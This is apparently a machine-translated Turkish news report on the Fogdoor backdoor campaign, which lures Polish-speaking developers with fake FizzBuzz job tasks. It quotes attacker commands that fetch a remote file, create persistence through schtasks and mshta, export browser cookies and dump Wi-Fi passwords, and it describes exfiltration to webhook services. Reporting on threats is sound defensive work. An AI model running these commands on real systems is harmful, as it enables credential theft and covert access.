Yazılım geliştiricilerini hedefleyen sofistike bir kötü amaçlı yazılım kampanyası ortaya çıktı ve Fogdoor olarak adlandırılan gizli bir arka kapı ile sistemlere sızmak için sahte kodlama zorluklarından yararlandı.
İlk olarak Mart 2025’te belirlenen bu tehdit, teknik işe alım değerlendirmeleri olarak maskelenen sosyal olarak tasarlanmış GitHub depoları aracılığıyla Polonya konuşan geliştiricileri ve iş arayanları özellikle hedeflemektedir.
Kötü amaçlı yazılımların çok aşamalı enfeksiyon zinciri, geliştiricilerin kodlama egzersizlerine aşinalıklarını kullanarak, Fizzbuzz testi gibi endüstri standart röportaj uygulamalarına olan güvenlerini silahlandırarak geleneksel güvenlik önlemlerini atlar.
Saldırı, “Rekrutacja-js” (“işe alım-js” için cila) hesabı altında “Fizzbuzz” adlı bir GitHub deposu ile başlar ve “Zadanie Rekrutacyjne.iso” (“İşe Alım Görevi”) etiketli bir ISO dosyası barındırır.
Bu dosya kusurlu bir JavaScript FizzBuzz uygulaması ve kötü niyetli bir Windows kısayolu (ReadMe.lnk) içerir.
Yürütüldüğünde, kısayol, Fogdoor’u dağıtan, kalıcılık oluşturan, hassas verileri ortadan kaldıran ve uzaktan komut yürütmeyi etkinleştiren bir PowerShell komut dosyasını tetikler.
Cyble Araştırma ve İstihbarat Laboratuarları (CRIL) bu kampanyayı 10 Mart 2025’te Polonya ve Polonya konuşan popülasyonlara sahip yakındaki bölgelere yapılan coğrafi olarak saldırılardaki hassasiyetini belirledi.
Fogdoor, kaçırma merkezli mimarisi ile kendini ayırt eder.
Geleneksel komut ve kontrol (C&C) sunucuları yerine, Bark.LGBT üzerindeki bir sosyal medya profilinden talimatları API çağrıları üzerinden alır ve veri söndürme için webhookbin.net gibi geçici WebHook hizmetlerini kullanır.
Bu yaklaşım, atıf ve altyapı yayından kaldırma işlemlerini zorlaştırır. Kötü amaçlı yazılım yükü SkyWatchWeather.exe, tarayıcı çerezlerini, Wi-Fi kimlik bilgilerini ve sistem meta verilerini sistematik olarak hasat ederken meşru yazılımı taklit eder.
Enfeksiyon mekanizması ve yürütme akışı
Saldırının başarısı, geliştirici iş akışlarından yararlanmasına bağlı.
.webp)
ISO dosyasını monte ettikten sonra, kurbanlar fizzbuzz.js ile karşılaşır – hata ayıklamayı istemek için tasarlanmış kasıtlı olarak kusurlu bir komut dosyası ve bir belge dosyası olarak gizlenmiş ReadMe.lnk.
.webp)
LNK dosyasının yürütülmesi, bir PowerShell komut dosyası başlatır (SHA-256: 33BC5FA9798219BA6D4E31FD73E2C0C33C70538B7C883) enfeksiyonu orchestating:-
$url = "hxxps://files.catbox.moe/umh6no.txt"
Invoke-WebRequest -Uri $url -OutFile "$env:USERPROFILE\README.txt"
Start-Process notepad.exe "$env:USERPROFILE\README.txt"Bu komut dosyası önce şüphe önlemek için sahte hata ayıklama talimatları içeren bir tuzak okuma.txt dağıtır.
Eşzamanlı olarak, SkyWatchWeather.exe’yi tehlikeye atılmış bir GitHub deposundan indirir ve C: \ Users \ Public \ İndirmelere kaydeder.
“Hava Durumu Widget” adlı planlanmış bir görev kalıcılığı sağlar ve kötü amaçlı yazılımları iki dakikada bir yeniden etkinleştirir:-
schtasks /create /tn "Weather Widget" /tr "mshta vbscript:Execute(...)" /sc minute /mo 2Fogdoor daha sonra WTTR.IN’in hava API’sını kullanarak coğrafi konum kontrollerini başlatır ve kurbanın ülkesi Polonya değilse yürütmeyi sonlandırır.
.webp)
Doğrulanmış hedefler için, TA’nın sosyal medya profiline hxxps: //bark.lgbt/api/v1/accounts/lookup?
Bu talimatlar şu şekilde yürütülür:-
Network.getAllCookies().then(cookies => { chrome.cookies.export(cookies); });Bu uzaktan hata ayıklama tekniği krom çerezleri çıkarırken, Firefox kimlik bilgileri %AppData %\ Roaming \ Mozilla \ Firefox \ profillerinden kopyalanır.
Wi-Fi şifreleri şu şekilde toplanır:-
netsh wlan show profile name="$name" key=clear >> %userprofile%\data\wifi.txtÇalınan veriler içine sıkıştırılır data.zip ve yüklendi fileBin.net MachineGuid’den türetilmiş bir URL kullanılarak, sahneleme dosyalarını ve geçici webhook izlerini silen bir temizleme rutini kullanın.
Cyble analistleri, bu çok katmanlı yaklaşımın-sosyal mühendislik, coğrafi kaplama ve geçici C&C kanallarını ortaya koyduğunu vurgulamaktadır.
Fogdoor’un operatörleri taktiklerini fatura temalı yemleri içerecek şekilde genişlettikçe, kuruluşlar güvenlik eğitimine öncelik vermeli ve bu tür sosyal olarak tasarlanmış tehditlere karşı koymak için davranışsal analizleri dağıtmalıdır.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free